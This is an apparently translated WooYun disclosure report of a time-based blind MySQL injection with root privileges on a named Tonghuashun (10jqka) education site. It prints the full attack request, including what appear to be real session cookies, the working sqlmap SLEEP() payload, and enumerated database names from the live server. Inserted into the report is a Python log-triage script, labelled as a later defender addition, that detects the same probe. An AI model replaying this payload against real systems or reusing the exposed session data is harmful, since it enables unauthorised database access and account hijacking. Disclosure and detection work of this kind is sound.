WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2016-03-22: Details reported to the vendor, awaiting vendor handling
2016-03-22: Vendor confirmed; details disclosed to the vendor only
2016-04-01: Details disclosed to core white hats and experts in related fields
2016-04-11: Details disclosed to regular white hats
2016-04-21: Details disclosed to intern white hats
2016-05-06: Details disclosed to the public

MySQL injection (root privileges) on a Tonghuashun (10jqka) site: passive testing wins again
POST /question.php?op=new&vid=11111 HTTP/1.1
Host: school.10jqka.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://school.10jqka.com.cn/question.php?op=submit
Cookie: __utma=156575163.1622041877.1458570243.1458570243.1458570243.1; __utmc=156575163; __utmz=156575163.1458570243.1.1.utmcsr=eeju.10jqka.com.cn|utmccn=(referral)|utmcmd=referral|utmcct=/; Hm_lvt_78c58f01938e4d85eaf619eae71b4ed1=1458570246; Hm_lpvt_78c58f01938e4d85eaf619eae71b4ed1=1458574949; user=MDpBYXNyb246NGYyYTNjMzhmYjEzNmZhZjkwYmJmZjE1NTllY2ZkNmU6Tm9uZTo1MDA6MzM3Nzg1NzI0OjcsMTExMTExMTExMTEsNDA7NDQsMTEsNDA7NiwxLDQwOzUsMSw0MDoyNzo6OjMyNzc4NTcyNDoxNDU4NTc0MjI4Ojo6MTQ1ODU3NDE0MA%3D%3D; userid=327785724; u_name=Aasron; escapename=Aasron; ticket=9ef8f7d770dc83445314fa13998847d7; historystock=601328; spversion=20130314; PHPSESSID=joibrrs8227g60ka1co36a69u4
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

question119=362&question120=364&question121=366

Injection parameter #1: question119
Injection parameter #2: question120
Injection parameter #3: question111

Time-based blind injection is a bit slow, so I'll just paste part of the database list as proof; a few entries are garbled, but it doesn't matter much.
Parameter: question119 (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: question119=362' AND (SELECT * FROM (SELECT(SLEEP(5)))ffpI) AND 'gGSE'='gGSE&question120=364&question121=366&vid=11111
---
[02:51:40] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0.12

[02:51:40] [INFO] fetching database names
[02:51:40] [INFO] fetching number of database
[02:51:40] [INFO] resumed: 58
[02:51:40] [INFO] resumed: information_schema
[02:51:40] [INFO] resumed: 10_bott\x04Am_stoc
[02:51:40] [INFO] resumed: 10jqka_info
[02:51:40] [INFO] resumed: 163
[02:51:40] [INFO] resumed: abc123
[02:51:40] [INFO] resumed: analysi\x04B
[02:51:40] [INFO] resumed: appdb
[02:51:40] [INFO] resumed: baike
[02:51:40] [INFO] resumed: bbs_nexus_com_}n
[02:51:40] [INFO] resumed: collection
[02:51:40] [INFO] resumed: datacenter
[02:51:40] [INFO] resumed: datapop
[02:51:40] [INFO] resumed: dcxj
[02:51:40] [INFO] resumed: fetch_hqB
[02:51:40] [INFO] resumed: gwdata
[02:51:40] [INFO] resumed: hexinzx
[02:51:40] [INFO] resumed: inv\x7fst_comb_new
[02:51:40] [INFO] resumed: investigation
[02:51:40] [INFO] resumed: k}ngkey
[02:51:40] [INFO] resumed: level2_tyzx
[02:51:40] [INFO] resumed: \x7fog
[02:51:40] [INFO] resumed: log1
[02:51:40] [INFO] resumed: logs
[02:51:40] [INFO] resumed: lost+found
[02:51:40] [INFO] resumed: mysql
[02:51:40] [INFO] resumed: nexus
[02:51:40] [INFO] resumed: n\x81ke
[02:51:40] [INFO] resumed: pass
[02:51:40] [INFO] resumed: qu\x04Asti\x04Vn
[02:51:40] [INFO] resumed: sales_adm\x04An
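Added defender-side example, not part of the original report: a Python triage script that scans constructed access-log lines for the MySQL SLEEP() probe shown above, decodes the URL-encoded POST body per parameter, and marks a hit as "confirmed" only when the recorded response time actually matches the requested delay (an attempted probe against a non-injectable parameter stays "attempted"). The log line format, the response-time field and the sample lines are assumptions.

```python
import re
from urllib.parse import parse_qsl

# MySQL time-based blind probe (the technique sqlmap used against question119
# in the report above). The requested delay is captured so it can be compared
# with the observed response time.
SLEEP_RE = re.compile(r"\bSLEEP\s*\(\s*(\d+)", re.I)
# Quote break-out followed by a boolean operator, as in: 362' AND (...) AND 'gGSE'='gGSE
BREAKOUT_RE = re.compile(r"['\"]\s*(?:AND|OR)\b", re.I)


def scan_body(body):
    """Return one finding per POST parameter that carries a SLEEP() probe."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):  # %xx decoded here
        m = SLEEP_RE.search(value)
        if m is None:
            continue
        findings.append({
            "param": name,
            "requested_delay_s": int(m.group(1)),
            "breakout": bool(BREAKOUT_RE.search(value)),
        })
    return findings


def scan_log(lines):
    """Triage constructed (assumed) log lines of the form
    '<ts> <status> <resp_ms> <method> <path> <body>'. A hit is 'confirmed'
    when the server stalled for at least the requested delay, i.e. the
    injected SLEEP() really executed in the database."""
    results = []
    for line in lines:
        parts = line.split(" ", 5)
        if len(parts) < 6:
            continue  # malformed line, skip rather than crash the triage
        ts, status, resp_ms, method, path, body = parts
        for f in scan_body(body):
            stalled = int(resp_ms) >= f["requested_delay_s"] * 1000
            f.update(ts=ts, path=path.split("?", 1)[0],
                     verdict="confirmed" if stalled else "attempted")
            results.append(f)
    return results


# Constructed sample traffic: a benign submission, the report's probe as it
# would appear URL-encoded on the wire (server stalled ~5 s), and the same
# style of probe against another parameter that did not stall.
SAMPLE_LOG = [
    "2016-03-22T02:51:40 200 118 POST /question.php?op=new&vid=11111 question119=362&question120=364&question121=366",
    "2016-03-22T02:51:45 200 5031 POST /question.php?op=new&vid=11111 question119=362%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ffpI%29%20AND%20%27gGSE%27%3D%27gGSE&question120=364&question121=366",
    "2016-03-22T02:51:46 200 121 POST /question.php?op=new&vid=11111 question119=362&question120=364&question121=366%27%20AND%20SLEEP%285%29%20AND%20%271%27%3D%271",
]

if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        print(r)
```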
Current database user: [email protected]

Severity: High
Vulnerability Rank: 15
Confirmed: 2016-03-22 13:38
The vulnerability has been confirmed and is being handled, thank you.
None yet